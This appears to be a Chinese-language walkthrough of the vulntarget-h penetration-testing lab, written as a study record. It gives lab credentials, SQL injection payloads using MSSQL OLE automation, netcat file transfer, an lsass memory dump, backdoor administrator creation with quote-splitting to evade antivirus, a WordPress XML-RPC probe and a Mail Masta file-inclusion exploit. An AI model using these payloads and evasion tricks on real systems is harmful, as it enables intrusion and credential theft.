0x01 环境

vulntarget-h拓扑

windows10:mimataichangjibuzhu
 windows7:mimataichangyebuhao
win2008: Winmimayijingwangjile@
sa:Adminweishenmezhegehaiyaomima@
wordpresss:root:zhehaiyaomima?

相关漏洞技术

sql注入、文件包含、命令执行，免杀等漏洞利用、隧道代理等

本地环境配置

win2008 >
    ip : 192.168.153.130   
    192.168.1.102
win7 > ip ：192.168.153.128
win10 > ip : 192.168.153.129

0x02 打靶记录

Win2008

打开这个站点看一下

note: use querystring value user_id to search for details of a particular users
备注:使用querystring值user_id查询特定用户的详细信息

既然都给提示了，那么就直接SQL注入吧

iis + aspx + Access / SQLServer 数据库

http://192.168.1.102/?user_id=1 and exists(select * from sysobjects)

http://192.168.1.102/?user_id=1 and (select IS_SRVROLEMEMBER('sysadmin')%3E0--

user_id=1;declare @f int,@g int; exec sp_oacreate 'Scripting.FileSystemObject',@f output; EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'C:\inetpub\wwwroot\11.txt'; EXEC sp_oamethod @f,'WriteLine',null,'aaaaac';

exec sp_configure 'show advanced options', 1;RECONFIGURE; exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; declare @o int; exec sp_oacreate 'scripting.filesystemobject', @o out; exec sp_oamethod @o, 'copyfile',null,'C:\Windows\System32\inetsrv\config\applicationHost.config' ,'C:\inetpub\custerr\zh-CN\404.htm';

访问一个不存在的目录，可以获得一个网站路径：

user_id=1;declare @f int,@g int; exec sp_oacreate 'Scripting.FileSystemObject',@f output; EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'C:\inetpub\edrfgyhujikopl\11.txt'; EXEC sp_oamethod @f,'WriteLine',null,'aaaaac';

成功写入

* Username : win2008
 * Domain   : WIN-7DSM1JVE9PO
 * Password : Winmimayijingwangjile@

* Username : Administrator
 * Domain   : WIN-7DSM1JVE9PO
 * Password : Adminmimayijingwangjile@

3389之后先直接果断地干掉360，先关闭主动防御：

windows7

双网卡

接收：nc -lvvp 1234 < 1.txt

发送：nc 127.0.0.1 1234 < 1.txt shell=c:/phpstudy_pro/nc64.exe 192.168.153.130 1234 < c:/phpstudy_pro/COM/a.txt

shell=system('c:/phpstudy_pro/gt.exe "c:/phpstudy_pro/pp.exe -accepteula -ma lsass.exe lsass.dmp"');

shell=system('c:/phpstudy_pro/gt.exe "net use"r" nami nanami_@_123.. /add"'); shell=system('c:/phpstudy_pro/gt.exe "net localgro"u"p administrators nami /add"'); shell=system('c:/phpstudy_pro/gt.exe "net localgroup administrators"');

windows10

这个win10设置开机自启web服务，记得点开一下，上面没有扫描这个地址，就是忘记开启phpstudy了。这里的IP地址不能改变必须是129，它web网站都是适应的设置好的IP

proxychains wpscan --url http://192.168.153.129/ --enumerate vp # 只枚举有漏洞的插件

proxychains wpscan --url http://192.168.153.129/ --enumerate vt # 只枚举存在漏洞的主题

使用插件扫描到XML-RPC漏洞，来验证一下：

POST /xmlrpc.php HTTP/1.1
Host: 192.168.153.129
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

https://www.exploit-db.com/exploits/40290

Title: Mail Masta WP Local File Inclusion

首先测试了一下是否存在远程文件包含，因为我已经拿下了win7这台机器，而且win10那台机器没法写文件。但是没有利用成功，应该是没有开启远程文件包含：

<?php phpinfo();

0x03 总结

拿下win10这个靶场也就打完了，可是打的过程中感觉怪怪的。就是杀毒环境，这个靶场的杀毒环境检测不是很严格，普通的免杀或者命令绕过就可以直接使用，甚至df都不检测执行的命令了，但是在抓密码的时候还是杀掉了我读取的lsass.dmp文件。在win10机器使用了一个smb绕过远程文件包含的技术，这个之前没有接触过，学到了。